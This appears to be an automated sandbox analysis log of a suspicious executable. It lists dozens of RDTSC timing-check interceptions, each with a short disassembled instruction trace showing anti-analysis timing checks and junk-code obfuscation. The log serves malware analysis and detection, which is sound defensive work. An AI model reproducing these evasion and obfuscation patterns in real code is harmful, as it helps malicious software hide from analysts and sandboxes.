              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC37 second address: EFAC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6E390E37F1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F6E390E37F1h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC68 second address: EFAC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFADC8 second address: EFADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFADCC second address: EFADD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFADD0 second address: EFADF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6E390E37E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F6E390E37F8h 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFADF8 second address: EFAE0B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E3947E05Eh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD048 second address: EFD04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD04E second address: EFD052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD052 second address: EFD063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD063 second address: EFD067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD067 second address: EFD0A0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F6E390E37F8h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6E390E37EEh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD0A0 second address: EFD107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6E3947E058h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 call 00007F6E3947E067h 0x00000029 or si, 76F2h 0x0000002e pop edi 0x0000002f sub dword ptr [ebp+122D1A1Eh], ecx 0x00000035 push 2CE7C4B6h 0x0000003a jng 00007F6E3947E068h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD107 second address: EFD10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD25A second address: EFD25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD25F second address: EFD265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD4EE second address: EFD4F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD4F4 second address: EFD4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD4FA second address: EFD4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD4FE second address: EFD510 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD5BE second address: EFD5C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD5C2 second address: EFD5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD5C8 second address: EFD5CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD887 second address: EFD89C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E390E37F1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDD0B second address: EFDD11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE075 second address: EFE07A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE1C7 second address: EFE1CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE733 second address: EFE7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnc 00007F6E390E37ECh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F6E390E37E8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jmp 00007F6E390E37F0h 0x00000032 push 00000000h 0x00000034 jmp 00007F6E390E37EFh 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d jmp 00007F6E390E37F8h 0x00000042 jng 00007F6E390E37E6h 0x00000048 popad 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE7AF second address: EFE7CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6E3947E062h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE7CE second address: EFE7D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE7D2 second address: EFE7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00152 second address: F00156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00156 second address: F0015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02201 second address: F02205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02205 second address: F02209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02209 second address: F0220F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0220F second address: F02233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02233 second address: F02283 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E390E37ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc edi, 5A117243h 0x00000011 movsx edi, bx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 movsx ebx, di 0x0000001a popad 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F6E390E37E8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push esi 0x00000038 mov esi, dword ptr [ebp+122D1FD1h] 0x0000003e pop edi 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02283 second address: F0228B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0228B second address: F02291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02C5A second address: F02C87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 4CA3ED81h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2E6Dh], edi 0x00000017 push 00000000h 0x00000019 mov edi, 4199B5FDh 0x0000001e xchg eax, ebx 0x0000001f push esi 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 pop esi 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03768 second address: F037AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E390E37E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F6E390E37E8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 xor dword ptr [ebp+122D19C8h], eax 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F6E390E37EBh 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F034B1 second address: F034B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0643D second address: F064C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F6E390E37F8h 0x0000000d mov dword ptr [ebp+122D379Ch], esi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F6E390E37E8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 jns 00007F6E390E37E6h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov dword ptr [ebp+122D1B94h], eax 0x00000047 mov eax, dword ptr [ebp+122D169Dh] 0x0000004d mov dword ptr [ebp+122D26BAh], esi 0x00000053 push FFFFFFFFh 0x00000055 mov edi, dword ptr [ebp+122D2AB0h] 0x0000005b push eax 0x0000005c jc 00007F6E390E37F2h 0x00000062 jl 00007F6E390E37ECh 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F091BD second address: F09203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E3947E05Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F6E3947E068h 0x00000015 ja 00007F6E3947E056h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6E3947E05Eh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0841E second address: F08448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F6E390E37E8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F093F8 second address: F09409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E3947E05Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B040 second address: F0B0C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F6E390E37E8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D2A94h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F6E390E37E8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 clc 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007F6E390E37F9h 0x00000052 jmp 00007F6E390E37F3h 0x00000057 popad 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A2EB second address: F0A30E instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E3947E058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F6E3947E082h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6E3947E05Eh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C09A second address: F0C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D2858h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F6E390E37E8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D3696h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F6E390E37E8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b js 00007F6E390E37E9h 0x00000051 movsx edi, di 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 pushad 0x00000057 jng 00007F6E390E37E6h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 jmp 00007F6E390E37EDh 0x00000065 popad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0CF92 second address: F0CF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F6E3947E056h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0CF9F second address: F0CFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C296 second address: F0C2AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C2AC second address: F0C2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EF00 second address: F0EF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D0A0 second address: F0D0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D0A4 second address: F0D0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D0A8 second address: F0D150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6E390E37F4h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f or bx, 622Dh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F6E390E37E8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 jmp 00007F6E390E37F8h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push ecx 0x00000042 mov edi, dword ptr [ebp+122D1A94h] 0x00000048 pop edi 0x00000049 mov eax, dword ptr [ebp+122D10F5h] 0x0000004f push edx 0x00000050 mov edi, dword ptr [ebp+122D2884h] 0x00000056 pop edi 0x00000057 push FFFFFFFFh 0x00000059 mov dword ptr [ebp+12474CE7h], ecx 0x0000005f nop 0x00000060 ja 00007F6E390E37EEh 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F6E390E37F1h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D150 second address: F0D154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0FF54 second address: F0FF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0FF5A second address: F0FFD9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov bh, 68h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F6E3947E058h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007F6E3947E063h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F6E3947E058h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c movsx ebx, bx 0x0000004f jo 00007F6E3947E05Ch 0x00000055 push ebx 0x00000056 mov bx, A7FFh 0x0000005a pop edi 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push ecx 0x0000005f push edi 0x00000060 pop edi 0x00000061 pop ecx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F10FB8 second address: F10FC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F6E390E37E6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F72 second address: F11F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6E3947E056h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F7D second address: F11F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F83 second address: F11F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F90 second address: F11F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11F98 second address: F12012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Ah 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jnc 00007F6E3947E05Bh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F6E3947E058h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 cld 0x00000031 xchg eax, esi 0x00000032 js 00007F6E3947E062h 0x00000038 jg 00007F6E3947E05Ch 0x0000003e push eax 0x0000003f pushad 0x00000040 pushad 0x00000041 push edx 0x00000042 pop edx 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pushad 0x00000047 jmp 00007F6E3947E068h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F18E second address: F0F194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F10121 second address: F101CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E05Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F6E3947E058h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jns 00007F6E3947E05Ch 0x0000002a push dword ptr fs:[00000000h] 0x00000031 or dword ptr [ebp+122D2DE4h], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F6E3947E058h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov bx, cx 0x0000005b mov eax, dword ptr [ebp+122D1321h] 0x00000061 call 00007F6E3947E05Eh 0x00000066 mov dword ptr [ebp+122D2E6Dh], esi 0x0000006c pop ebx 0x0000006d push FFFFFFFFh 0x0000006f mov edi, ebx 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 jmp 00007F6E3947E062h 0x0000007c popad 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F12210 second address: F12215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
